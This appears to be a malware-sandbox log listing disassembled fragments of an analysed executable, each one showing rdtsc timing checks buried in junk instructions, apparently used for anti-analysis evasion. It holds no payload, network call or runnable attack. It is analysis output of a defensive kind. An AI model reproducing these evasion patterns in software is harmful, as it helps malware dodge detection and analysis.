            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0CC9F second address: D0CCA9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F82E84F6186h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D103A8 second address: D103AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D103AC second address: D103B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D103B2 second address: D103E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007F82E8EDE51Fh 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push ebx 0x00000012 jmp 00007F82E8EDE527h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D103E7 second address: D10426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F82E84F6190h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F82E84F6193h 0x00000012 je 00007F82E84F6194h 0x00000018 jmp 00007F82E84F618Eh 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0FF96 second address: D0FF9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D25574 second address: D2557A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2557A second address: D2557E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2557E second address: D25591 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E84F618Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D25591 second address: D255CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F82E8EDE51Fh 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 jmp 00007F82E8EDE528h 0x00000016 popad 0x00000017 push ecx 0x00000018 pushad 0x00000019 jnp 00007F82E8EDE516h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D255CF second address: D255F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F82E84F6192h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F82E84F6186h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2589B second address: D258B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 js 00007F82E8EDE516h 0x0000000e jg 00007F82E8EDE516h 0x00000014 popad 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D258B0 second address: D258BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F82E84F6186h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D258BC second address: D258C5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26054 second address: D26058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26058 second address: D2606F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F82E8EDE516h 0x00000008 jg 00007F82E8EDE516h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2606F second address: D2607F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F82E84F618Bh 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D262C4 second address: D262C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D262C8 second address: D262D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edi 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D27CD2 second address: D27CE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E8EDE523h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2A98A second address: D2A99C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F82E84F6186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F82E84F6186h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2C5F3 second address: D2C635 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E8EDE51Ch 0x00000007 jmp 00007F82E8EDE51Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jmp 00007F82E8EDE525h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c je 00007F82E8EDE516h 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2C635 second address: D2C63F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F82E84F6186h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2C19B second address: D2C1A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2E10C second address: D2E12E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F82E84F6194h 0x0000000b pop ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C459DD second address: C459E9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C459E9 second address: C459EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C459EF second address: C459F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B036C second address: 53B0397 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 290Ah 0x00000007 push edi 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d pushad 0x0000000e mov cx, bx 0x00000011 popad 0x00000012 mov ebp, esp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F82E84F6193h 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53B0397 second address: 53B03B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E8EDE529h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0831 second address: 53D088A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 mov dx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c pushad 0x0000000d push esi 0x0000000e call 00007F82E84F6195h 0x00000013 pop eax 0x00000014 pop edi 0x00000015 movzx ecx, bx 0x00000018 popad 0x00000019 push eax 0x0000001a jmp 00007F82E84F6198h 0x0000001f xchg eax, ecx 0x00000020 jmp 00007F82E84F6190h 0x00000025 xchg eax, esi 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D088A second address: 53D08E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E8EDE51Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ch, 45h 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007F82E8EDE51Ch 0x00000012 xchg eax, esi 0x00000013 pushad 0x00000014 mov al, 4Ch 0x00000016 mov eax, edi 0x00000018 popad 0x00000019 lea eax, dword ptr [ebp-04h] 0x0000001c jmp 00007F82E8EDE525h 0x00000021 nop 0x00000022 jmp 00007F82E8EDE51Eh 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b mov esi, 11431863h 0x00000030 popad 0x00000031 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D08E0 second address: 53D08E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D08E5 second address: 53D0919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F82E8EDE520h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d pushad 0x0000000e mov ax, B4FDh 0x00000012 call 00007F82E8EDE51Ah 0x00000017 mov ax, D931h 0x0000001b pop esi 0x0000001c popad 0x0000001d push dword ptr [ebp+08h] 0x00000020 pushad 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D09AF second address: 53D09B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D09B3 second address: 53D09B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D09B7 second address: 53D09D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F82E84F6195h 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D09D6 second address: 53D09F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E8EDE521h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov esi, edi 0x0000000f popad 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D09F2 second address: 53D09F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D09F8 second address: 53D09FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D09FC second address: 53D002C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c cmp eax, 00000000h 0x0000000f setne al 0x00000012 xor ebx, ebx 0x00000014 test al, 01h 0x00000016 jne 00007F82E84F6187h 0x00000018 xor eax, eax 0x0000001a sub esp, 08h 0x0000001d mov dword ptr [esp], 00000000h 0x00000024 mov dword ptr [esp+04h], 00000000h 0x0000002c call 00007F82ECE52461h 0x00000031 mov edi, edi 0x00000033 jmp 00007F82E84F6190h 0x00000038 xchg eax, ebp 0x00000039 pushad 0x0000003a jmp 00007F82E84F618Eh 0x0000003f mov ch, E4h 0x00000041 popad 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D002C second address: 53D0030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0030 second address: 53D0036 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0036 second address: 53D003C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D003C second address: 53D0040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0040 second address: 53D0059 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E8EDE51Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov edi, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 mov bx, ax 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0059 second address: 53D00A9 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F82E84F6194h 0x00000008 add eax, 54766748h 0x0000000e jmp 00007F82E84F618Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 jmp 00007F82E84F6196h 0x0000001e push FFFFFFFEh 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov di, 85C0h 0x00000027 push edx 0x00000028 pop eax 0x00000029 popad 0x0000002a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D00A9 second address: 53D00AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D00AF second address: 53D00B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D00B3 second address: 53D0135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007F82E8EDE519h 0x0000000d jmp 00007F82E8EDE528h 0x00000012 push eax 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F82E8EDE521h 0x0000001a jmp 00007F82E8EDE51Bh 0x0000001f popfd 0x00000020 push eax 0x00000021 call 00007F82E8EDE51Fh 0x00000026 pop ecx 0x00000027 pop ebx 0x00000028 popad 0x00000029 mov eax, dword ptr [esp+04h] 0x0000002d pushad 0x0000002e mov esi, edi 0x00000030 mov di, F174h 0x00000034 popad 0x00000035 mov eax, dword ptr [eax] 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F82E8EDE524h 0x00000040 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0135 second address: 53D0139 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0139 second address: 53D013F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D013F second address: 53D0272 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 3A60BAC3h 0x00000008 pushfd 0x00000009 jmp 00007F82E84F6198h 0x0000000e and ax, 4588h 0x00000013 jmp 00007F82E84F618Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 jmp 00007F82E84F6199h 0x00000025 pop eax 0x00000026 pushad 0x00000027 pushad 0x00000028 jmp 00007F82E84F618Ah 0x0000002d pushfd 0x0000002e jmp 00007F82E84F6192h 0x00000033 xor ax, BA48h 0x00000038 jmp 00007F82E84F618Bh 0x0000003d popfd 0x0000003e popad 0x0000003f jmp 00007F82E84F6198h 0x00000044 popad 0x00000045 call 00007F82E84F6189h 0x0000004a pushad 0x0000004b pushfd 0x0000004c jmp 00007F82E84F618Eh 0x00000051 and ah, FFFFFFD8h 0x00000054 jmp 00007F82E84F618Bh 0x00000059 popfd 0x0000005a mov cx, D68Fh 0x0000005e popad 0x0000005f push eax 0x00000060 jmp 00007F82E84F6195h 0x00000065 mov eax, dword ptr [esp+04h] 0x00000069 jmp 00007F82E84F6191h 0x0000006e mov eax, dword ptr [eax] 0x00000070 pushad 0x00000071 pushfd 0x00000072 jmp 00007F82E84F6197h 0x00000077 add esi, 0D70DCAEh 0x0000007d jmp 00007F82E84F6199h 0x00000082 popfd 0x00000083 pushad 0x00000084 push eax 0x00000085 push edx 0x00000086 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0272 second address: 53D0288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx esi, bx 0x00000007 popad 0x00000008 popad 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push edx 0x00000011 pop eax 0x00000012 movsx edi, ax 0x00000015 popad 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0288 second address: 53D02D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E84F6199h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jmp 00007F82E84F618Eh 0x0000000f mov eax, dword ptr fs:[00000000h] 0x00000015 jmp 00007F82E84F6190h 0x0000001a nop 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov dl, 3Fh 0x00000020 mov edi, esi 0x00000022 popad 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D02D3 second address: 53D0303 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E8EDE51Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F82E8EDE529h 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0303 second address: 53D0307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0307 second address: 53D031A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E8EDE51Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D031A second address: 53D0340 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E84F6199h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 18h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0340 second address: 53D0344 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0344 second address: 53D0357 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E84F618Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0357 second address: 53D037B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E8EDE529h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d movzx esi, di 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D037B second address: 53D03BA instructions: 0x00000000 rdtsc 0x00000002 movsx edi, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 call 00007F82E84F6190h 0x0000000c mov ah, F6h 0x0000000e pop edx 0x0000000f popad 0x00000010 push eax 0x00000011 jmp 00007F82E84F618Dh 0x00000016 xchg eax, ebx 0x00000017 jmp 00007F82E84F618Eh 0x0000001c xchg eax, esi 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D03BA second address: 53D03BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D03BE second address: 53D03C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D03C4 second address: 53D03EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E8EDE524h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F82E8EDE51Bh 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 pop ebx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D03EE second address: 53D041E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov bx, ax 0x00000009 popad 0x0000000a xchg eax, edi 0x0000000b pushad 0x0000000c movzx esi, di 0x0000000f jmp 00007F82E84F6191h 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F82E84F618Ch 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D041E second address: 53D0424 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0424 second address: 53D043E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E84F618Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D043E second address: 53D0442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0442 second address: 53D0455 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E84F618Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0455 second address: 53D045B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D045B second address: 53D045F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D045F second address: 53D0463 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0463 second address: 53D04F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [769B4538h] 0x0000000d pushad 0x0000000e call 00007F82E84F618Dh 0x00000013 pushfd 0x00000014 jmp 00007F82E84F6190h 0x00000019 or esi, 6B043768h 0x0000001f jmp 00007F82E84F618Bh 0x00000024 popfd 0x00000025 pop esi 0x00000026 pushfd 0x00000027 jmp 00007F82E84F6199h 0x0000002c sbb cx, E986h 0x00000031 jmp 00007F82E84F6191h 0x00000036 popfd 0x00000037 popad 0x00000038 xor dword ptr [ebp-08h], eax 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e mov dh, A0h 0x00000040 call 00007F82E84F6194h 0x00000045 pop esi 0x00000046 popad 0x00000047 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D04F2 second address: 53D052B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F82E8EDE51Ch 0x0000000b jmp 00007F82E8EDE525h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 xor eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F82E8EDE51Ah 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D052B second address: 53D0540 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E84F618Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53D0540 second address: 53D0547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dh, 59h 0x00000006 popad 0x00000007 rdtsc
